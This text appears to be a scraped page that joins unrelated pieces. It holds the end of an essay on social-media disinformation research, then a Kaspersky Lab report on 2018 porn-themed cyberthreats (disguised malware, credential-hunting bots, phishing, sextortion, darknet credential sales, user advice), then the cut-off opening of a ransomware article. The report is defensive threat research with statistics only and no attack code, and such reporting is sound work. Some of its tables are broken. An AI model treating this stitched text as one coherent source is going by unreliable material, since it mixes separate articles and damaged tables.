The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.
Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.
Its not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.
The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.
We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.
2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms – Tumblr – announced it was banning erotic content (even though almost a quarter of its users consume adult content). In addition, the UK received the title of ‘The Second Most Porn-Hungry Country in the World‘ and is now implementing a law on age-verification for pornography lovers that will prohibit anyone below the age of 18 to watch this sort of content. This is potentially opening a world of new tricks for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks declared a ‘holy war’ on porn as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.
Such measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active adult website user, who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.
It is no secret that digital pornography has long been associated with malware and cyberthreats. While some of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted research on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year’s report was the fact that cybercriminals not only use adult content in multiple ways – from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims’ banking credentials and other personal information – but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.
Last year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.
It would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.
That said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.
Methodology and key findings
To measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how is it used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured how often and how many users of our products have encountered adult-content themed threats.
Additionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.
As a result, we discovered the following:
- Searching for pornography online has become safer: in 2018, there were 650,000 attacks launched from online resources. That is 36% less than in 2017 when more than a million of these attacks were detected.
- Cybercriminals are actively using popular porn-tags to promote malware in search results. The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.
- In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017, with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.
- The number of unique sales offers of credentials for premium accounts to adult content websites almost doubled to more than 10,000.
- Porn-themed threats increased in terms of the number of samples, but declined in terms of variety: In 2018, Kaspersky Lab identified at least 642 families of PC threats disguised under one common pornography tag. In terms of their malicious function, these families were distributed between 57 types (76 last year). In most cases they are are Trojan-Downloaders, Trojans and AdWare.
- 89% of infected files disguised as pornography on Android devices turned out to be AdWare.
- In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached 21,902 attacks.
Part 1 – Malware
As mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users’ computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.
To do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called ‘black SEO’ techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.
According to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word ‘porn’), plus those that have the word ‘porn’ in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against ‘black SEO’ activities and protecting users from malicious content.
Porn tags = Malware tags
Optimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims’ devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A ‘porn tag’ is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.
To check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.
The overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub’s statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.
Perhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn’t find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.
Moving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.
The top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.
|Distribution of porn-themed threat types in 2017||Distribution of porn-themed threat types in 2018|
|Trojan||19%||AdWare (not a virus)||9%|
|AdWare (not a virus)||11%||Worm||8%|
|Virus||2%||Downloader (not a virus)||2%|
|RiskTool (not a virus)||2%||Exploit||2%|
|Downloader (not a virus)||2%||Trojan-Dropper||2%|
Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network
Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network (download)
The most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (the detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named CVE-2010-2568. However, the same detection name applies for another vulnerability in LNK – CVE-2017-8464. This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors – thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).
The rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim’s device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim’s device only once and would then be able to use it in multiple malicious ways.
2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.
Following technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.
The landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.
|Malware name||%||Malware name||%|
Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network
These threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.
A specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities are they perform, to prevent emerging threats.
We particularly track botnets that are made of malware.Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprized to discover that there are bots in these botnets that hunt for credentials to pornography websites.
Based on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.
In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.
Another important shift that happened in 2018, was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.
Apparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.
Part 2 – Phishing and spam
Our previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.
These are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4, 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was 1,608. Within a year, in Q4 2018, the number of such attempts (21,902) was more than ten times higher.
The overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was 38,305. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were 37,144 attempts to visit the phishing version of the website, while there were only 1,161 attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low, other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.
It is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.
Fake versions of popular pornography websites target users’ credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credentials capture is one of the most popular ways to target users, using pornography to implement phising fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18-years-old.
As the victim enters their password, the threat actor captures the credentials to the user’s social network account.
Pornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.
Needless to say, instead of downloading a video player, the user downloads malware.
Sometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.
We have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of ‘standard’ advertising offering adult content on legitimate and illegal websites, this type of threat hasn’t been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started to happen. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.
The scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.
2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also ‘proving’ the legitimacy of the scammers claims by providing the user with actual information about them.
In most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.
Furthermore, these e-mails have been sent out in more languages than previously found.
In reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.
Part 3 – Darknet insights
One of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. It is often the case that users can register for pornography accounts through a ‘premium’ subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people claim that money paid for porn “directly fuels the industry that supports the abuse, exploitation, and trafficking around the world”. Others argue that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as tv-series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.
Whether it is worth it or not, some users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.
The research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb – an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers’ feedback. All of them contained one to more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with of course, no legal guarantees of delivering on their promise).
The results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.
The quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 – the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people’s credentials while watching pornography.
Conclusions and advice
Overall, the amount of downloadable malware disguised as pornography detected on users’ devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the ‘classic’ infected pornography websites and video files armed with malware. These challenges should be addressed properly.
Another cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers not corporations, the fact that most consumers have job to go to every day, brings a certain risk to IT administrators responsible for securing corporate networks.
In order to consume and produce adult content safely, Kaspersky Lab advises the following:
- Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.
- Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.
- If you wish to buy a paid subscription to an adult content website – purchase it only on the official website. Double check the URL of the website and make sure it is authentic.
- Check any email attachments with a security solution before opening them –especially from dark web entities (even if they are expected to come from an anonymous source).
- Patch the software on your PC as soon as security updates for the latest bugs are available.
- Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website.
- Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Total Security, to detect and block spam and phishing attacks.
- Use a robust security solution to protect you from malicious software and its actions – such as the Kaspersky Internet Security for Android.
- Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.
- Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as Kaspersky Endpoint Security for Business. In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.
Ransomware has been making a lot of splashy headlines over recent years with high profile attacks, such as WannaCry and NotPetya, dominating the news in large-scale breaches. While these massive breaches are certainly terrifying, the more common attacks are actually being inflicted across much smalle